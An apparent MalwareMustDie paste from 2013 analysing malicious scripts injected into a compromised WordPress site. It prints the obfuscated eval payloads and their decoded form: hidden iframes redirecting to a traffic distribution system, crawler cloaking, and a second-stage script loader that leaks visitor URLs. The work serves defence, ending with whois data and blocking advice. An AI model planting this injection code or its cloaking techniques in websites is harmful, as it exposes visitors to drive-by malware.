MalwareMustDie

#MalwareMustDie - Warning: movieshuttle.net / 50.87.40.75

Mar 1st, 2013
  1. #MalwareMustDie! @unixfreaxjp /malware]$ date
  2. Sat Mar  2 02:09:41 JST 2013
  3.  
  4. // And also beware of: movieshuttle.net / 50.87.40.75
  5. // Same pattern as oklahomanews-online.com: an apparently compromised WordPress site (see the X-Pingback/xmlrpc.php and X-CF-Powered-By headers below) with scripts injected into every page that redirect visitors to a malicious TDS (traffic distribution system).
  6.  
  7. movieshuttle.net     A  50.87.40.75
  8. movieshuttle.net     NS     ns1.rhostjh.com
  9. movieshuttle.net     NS     ns2.rhostjh.com
  10.  
  11. h00p://movieshuttle.net/american-reunion-2012.html
  12. or
  13. h00p://movieshuttle.net/american-reunion-2012.html
  14. h00p://movieshuttle.net/yohan-barnevandrer-2010.html
  15. h00p://movieshuttle.net/tag/1937
  16. h00p://movieshuttle.net/hoodwinked-too-hood-vs-evil-2011.html
  17. h00p://movieshuttle.net/flame-and-citron-2008.html
  18.  
  19. // Headers...
  20.  
  21. --2013-03-02 01:58:43--  h00p://movieshuttle.net/beautiful-boy-2010.html
  22. Resolving movieshuttle.net... seconds 0.00, 50.87.40.75
  23. Caching movieshuttle.net => 50.87.40.75
  24. Connecting to movieshuttle.net|50.87.40.75|:80... seconds 0.00, connected.
  25.   :
  26. h00p/1.1 200 OK
  27. Date: Fri, 01 Mar 2013 16:58:27 GMT
  28. Server: Apache
  29. X-CF-Powered-By: WP 1.3.9
  30. X-Pingback: h00p://movieshuttle.net/xmlrpc.php
  31. Link: <h00p://movieshuttle.net/?p=3263>; rel=shortlink
  32. Cache-Control: max-age=31104000
  33. Expires: Mon, 24 Feb 2014 16:58:27 GMT
  34. Vary: Accept-Encoding
  35. Connection: close
  36. Content-Type: text/html; charset=UTF-8
  37. 200 OK
  38. Length: unspecified [text/html]
  39. Saving to: `beautiful-boy-2010.html'
  40. 2013-03-02 01:58:46 (91.0 KB/s) - `beautiful-boy-2010.html' saved [108323]
  41.  
  42.  
  43. // Got this script, injected twice into every page. Caution when reading or reconstructing it: in this copy of the paste the digit 0 is rendered as the letter O throughout (e.g. 'Oxff', 'i=O', '63O', the '4O' array entries), so read O as 0. Script 1 reverses the lO1 string (O1O), base64-decodes it (_O1O) and eval()s the result (the lO1 payload itself is elided in this copy); script 2 decodes the n[] array with parseInt(x, 12*2+1+1) — i.e. base 26 — and eval()s that.
  44.   :
  45. <script language="javascript" type="text/javascript">var lO1='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';var _Ox84de=["ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzO123456789+/=","","charAt","indexOf","fromCharCode","length"];function _O1O(data){var O1OlOI=_Ox84de[O];var o1,o2,o3,h1,h2,h3,h4,bits,i=O,enc=_Ox84de[1];do{h1=O1OlOI[_Ox84de[3]](data[_Ox84de[2]](i++));h2=O1OlOI[_Ox84de[3]](data[_Ox84de[2]](i++));h3=O1OlOI[_Ox84de[3]](data[_Ox84de[2]](i++));h4=O1OlOI[_Ox84de[3]](data[_Ox84de[2]](i++));bits=h1<<18|h2<<12|h3<<6|h4;o1=bits>>16&Oxff;o2=bits>>8&Oxff;o3=bits&Oxff;if(h3==64){enc+=String[_Ox84de[4]](o1);} else {if(h4==64){enc+=String[_Ox84de[4]](o1,o2);} else {enc+=String[_Ox84de[4]](o1,o2,o3);} ;} ;} while(i<data[_Ox84de[5]]);;return enc;} ;function O1O(string){var ret=_Ox84de[1],i=O;for(i=string[_Ox84de[5]]-1;i>=O;i--){ret+=string[_Ox84de[2]](i);} ;return ret;} ;eval(_O1O(O1O(lO1)));</script><script>try{window.document.body/=2}catch(dgsgsdg){whwej=12;ww=window;}if(whwej){try{f=document.createElement("div");}catch(agdsg){whwej=O;}try{document.body--;}catch(bawetawe){if(ww.document){v=window;n=["9","9","41","3o","16","1e","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","4b","2e","4h","36","3j","3p","3O","3j","45","3n","1e","1d","3k","47","3m","4h","1d","1f","3d","1m","3f","1f","4j","d","9","9","9","41","3o","4a","3j","45","3n","4a","1e","1f","27","d","9","9","4l","16","3n","44","4b","3n","16","4j","d","9","9","9","3m","47","3l","4d","45","3n","46","4c","1k","4f","4a","41","4c","3n","1e","18","28","41","3o","4a","3j","45","3n","16","4b","4a","3l","29","1d","4O","4c","4c","48","26","1l","1l","3p","47","47","3p","44","3n","3l","44","41","3l","43","1k","41","46","3o","47","1l","2b","4c","4a","3j","4e","3n","44","1d","16","4f","41","3m","4c","4O","29","1d","1n","1m","1m","1d","16","4O","3n","41","3p","4O","4c","29","1d","1n","1m","1m","1d","16","4b","4c","4h","44","3n","29","1d","4f","41","3m","4c"
,"4O","26","1n","1m","1m","48","4g","27","4O","3n","41","3p","4O","4c","26","1n","1m","1m","48","4g","27","48","47","4b","41","4c","41","47","46","26","3j","3k","4b","47","44","4d","4c","3n","27","4e","41","4b","41","3k","41","44","41","4c","4h","26","4O","41","3m","3m","3n","46","27","44","3n","3o","4c","26","1j","1n","1m","1m","1m","1m","48","4g","27","4c","47","48","26","1m","27","1d","2a","28","1l","41","3o","4a","3j","45","3n","2a","18","1f","27","d","9","9","4l","d","9","9","3o","4d","46","3l","4c","41","47","46","16","41","3o","4a","3j","45","3n","4a","1e","1f","4j","d","9","9","9","4e","3j","4a","16","3o","16","29","16","3m","47","3l","4d","45","3n","46","4c","1k","3l","4a","3n","3j","4c","3n","2h","44","3n","45","3n","46","4c","1e","1d","41","3o","4a","3j","45","3n","1d","1f","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","4b","4a","3l","1d","1i","1d","4O","4c","4c","48","26","1l","1l","3p","47","47","3p","44","3n","3l","44","41","3l","43","1k","41","46","3o","47","1l","2b","4c","4a","3j","4e","3n","44","1d","1f","27","3o","1k","4b","4c","4h","44","3n","1k","44","3n","3o","4c","29","1d","1j","1n","1m","1m","1m","1m","48","4g","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4e","41","4b","41","3k","41","44","41","4c","4h","29","1d","4O","41","3m","3m","3n","46","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4c","47","48","29","1d","1m","1d","27","3o","1k","4b","4c","4h","44","3n","1k","48","47","4b","41","4c","41","47","46","29","1d","3j","3k","4b","47","44","4d","4c","3n","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4c","47","48","29","1d","1m","1d","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","4f","41","3m","4c","4O","1d","1i","1d","1n","1m","1m","1d","1f","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","4O","3n","41","3p","4O","4c","1d","1i","1d","1n","1m","1m","1d","1f","27","d","9","9","9","3m","47","3l","4d","45","3n","46","4c
","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","4b","2e","4h","36","3j","3p","3O","3j","45","3n","1e","1d","3k","47","3m","4h","1d","1f","3d","1m","3f","1k","3j","48","48","3n","46","3m","2f","4O","41","44","3m","1e","3o","1f","27","d","9","9","4l"];h=2;s="";if(whwej){for(i=O;i-63O!=O;i++){k=i;s+=String["fro"+"mC"+"harCode"](parseInt(n[i],12*2+1+1));}z=s;ww["eval"](s);}}}}</script>
  46.   :
  47.  
  48. // Deobfuscated output of the injected scripts. Defanged: h00p = http. The long string literals below were wrapped across two lines by the paste and are a single line in the original.
  49.  
  // URL-encoded hidden iframe (5x5 px) pointing at the googleclick.info TDS landing page;
  // it is written into the page by document.write(unescape(_escape)) at the end of this script.
  // (The literal was wrapped over two lines by the paste; it is one line in the original.)
  50. var _escape = '
  51. %3Ciframe%20src%3D%22h00p%3A//googleclick.info/%3Ftravel%22%20width%3D5%20height%3D5%20frameborder%3D5%3E%3C/iframe%3E';
  // Crawler cloaking: search-engine user agents (Rambler and Yandex are Russian search engines,
  // 'Yaho' matches Yahoo's crawler) never get the iframe. No Break() is defined anywhere in the
  // captured code, so this call throws a ReferenceError and aborts the script before the
  // second-stage loader and the iframe below are reached — deliberate or not, that is the cloaking exit.
  52. if (window.navigator.userAgent.indexOf('Rambler') >= 0 || window.navigator.userAgent.indexOf('Yandex') >= 0 || window.navigator.userAgent.indexOf('Yaho') >= 0 || window.navigator.userAgent.indexOf('Googlebot') >= 0 || window.navigator.userAgent.indexOf('Turtle') >= 0){
  53.   Break();
  54. }
  55. ;
  // Anti-inspection handlers: disable text selection, mouse-down, the right-click context menu
  // and drag-start so the injected markup is harder to select/copy from the rendered page.
  // All of this is trivially bypassed (devtools, or fetching the page with wget as above).
  56. document.onselectstart = function (){
  57.   return false;
  58. }
  59. ;
  60. document.onmousedown = function (){
  61.   return false;
  62. }
  63. ;
  64. document.oncontextmenu = function (){
  65.   return false;
  66. }
  67. ;
  // Swallows Ctrl+U (view source, keyCode 85), Ctrl+C (copy, 67), Ctrl+A (select all, 65)
  // and Ctrl+Insert (copy, 45). Same check is installed on both keydown and keypress.
  68. document.onkeydown = function (e){
  69.   e = e || window.event;
  70.   if (e.ctrlKey){
  71.     if ((e.keyCode == '85') || (e.keyCode == '67') || (e.keyCode == '65') || (e.keyCode == '45'))return false;
  72.   }
  73. }
  74. ;
  75. document.onkeypress = function (e){
  76.   e = e || window.event;
  77.   if (e.ctrlKey){
  78.     if ((e.keyCode == '85') || (e.keyCode == '67') || (e.keyCode == '65') || (e.keyCode == '45'))return false;
  79.   }
  80. }
  81. ;
  82. document.ondragstart = function (){
  83.   return false;
  84. }
  85. ;
  // onbeforeprint handler: hides every element in the document (document.all is an IE-era
  // collection) and tags each hidden element with id 'atlpdpst' so atlpdp2 can restore it.
  // Net effect: printing the page produces a blank page. Note 'wi' is an implicit global.
  86. function atlpdp1(){
  87.   for (wi = 0; wi < document.all.length; wi ++ ){
  88.     if (document.all[wi].style.visibility != 'hidden'){
  89.       document.all[wi].style.visibility = 'hidden';
  90.       document.all[wi].id = 'atlpdpst'
  91.     }
  92.   }
  93. }
  // onafterprint handler: restores visibility of everything atlpdp1 hid (matched by the
  // 'atlpdpst' id it assigned). Original element ids are not restored — they were overwritten.
  94. function atlpdp2(){
  95.   for (wi = 0; wi < document.all.length; wi ++ ){
  96.     if (document.all[wi].id == 'atlpdpst')document.all[wi].style.visibility = ''
  97.   }
  98. }
  99. window.onbeforeprint = atlpdp1;
  100. window.onafterprint = atlpdp2;
  // Second-stage loader: injects a remote script from api.myobfuscate.com into <head>,
  // leaking the victim's referrer and full page URL as query parameters (presumably for
  // tracking / per-victim payload selection — the script served back was not captured here).
  // Worth watching api.myobfuscate.com in proxy logs alongside the two domains above.
  101. var _0OO = document.createElement('script');
  102. _0OO.src = 'h00p://api.myobfuscate.com/?getsrc=ok' + '&ref=' + encodeURIComponent(document.referrer) + '&url=' + encodeURIComponent(document.URL);
  103. var OIl = document.getElementsByTagName('head')[0];
  104. OIl.appendChild(_0OO);
  // Finally drops the hidden googleclick.info iframe (decoded from _escape) into the page.
  105. document.write(unescape(_escape));
  106.  
  107.  
  108. // The second injected script (the base-26 n[] array) decodes to this iframer, which loads the same googleclick.info/?travel landing page via a hidden, off-screen iframe.
  109.  
  // If <body> already exists, append the iframe through the DOM; otherwise (script ran before
  // the body was parsed) document.write it. Either way the result is an invisible 100x100
  // iframe positioned off-screen at left:-10000px that loads googleclick.info/?travel.
  // (The string literal below was wrapped over three lines by the paste.)
  110. if (document.getElementsByTagName('body')[0]){
  111.   iframer();
  112. }
  113. else {
  114.   document.write("
  115. <iframe src='h00p://googleclick.info/?travel' width='100' height='100' style='width:100px;
  116. height:100px;position:absolute;visibility:hidden;left:-10000px;top:0;'></iframe>");
  117. }
  // Builds the hidden 100x100 iframe to googleclick.info/?travel and appends it to <body>:
  // absolutely positioned 10000px off the left edge and visibility:hidden, so the victim never
  // sees it while the browser still fetches and renders the landing page. (top is set twice in the original.)
  118. function iframer(){
  119.   var f = document.createElement('iframe');
  120.   f.setAttribute('src', 'h00p://googleclick.info/?travel');
  121.   f.style.left = '-10000px';
  122.   f.style.visibility = 'hidden';
  123.   f.style.top = '0';
  124.   f.style.position = 'absolute';
  125.   f.style.top = '0';
  126.   f.setAttribute('width', '100');
  127.   f.setAttribute('height', '100');
  128.   document.getElementsByTagName('body')[0].appendChild(f);
  129. }
  130.  
  131. // Who's responsible for googleclick.info? (whois below — the registrant is hidden behind a privacy service)
  132.  
  133. Domain ID:D49081589-LRMS
  134. Domain Name:GOOGLECLICK.INFO
  135. Created On:01-Feb-2013 07:48:44 UTC
  136. Last Updated On:26-Feb-2013 05:48:36 UTC
  137. Expiration Date:01-Feb-2014 07:48:44 UTC
  138. Sponsoring Registrar:DomainContext Inc. (R524-LRMS)
  139. Status:CLIENT TRANSFER PROHIBITED
  140. Status:TRANSFER PROHIBITED
  141. Registrant ID:PP-SP-001
  142. Registrant Name:Domain Admin
  143. Registrant Organization:PrivacyProtect.org
  144.   :
  145. Name Server:NS1D3.STATUSHOST.RU
  146. Name Server:NS2D3.STATUSHOST.RU
  147.  
  148. // Just block this — it is an infector chain, not a legitimate site: movieshuttle.net / 50.87.40.75 and googleclick.info at the DNS/proxy layer, and keep an eye on api.myobfuscate.com, which the deobfuscated loader above pulls a second stage from. googleclick.info was registered only a month before this capture (01-Feb-2013), behind PrivacyProtect.org, on .ru name servers — typical throwaway redirector infrastructure.
  149.  
  150. ----
  151. #MalwareMustDie!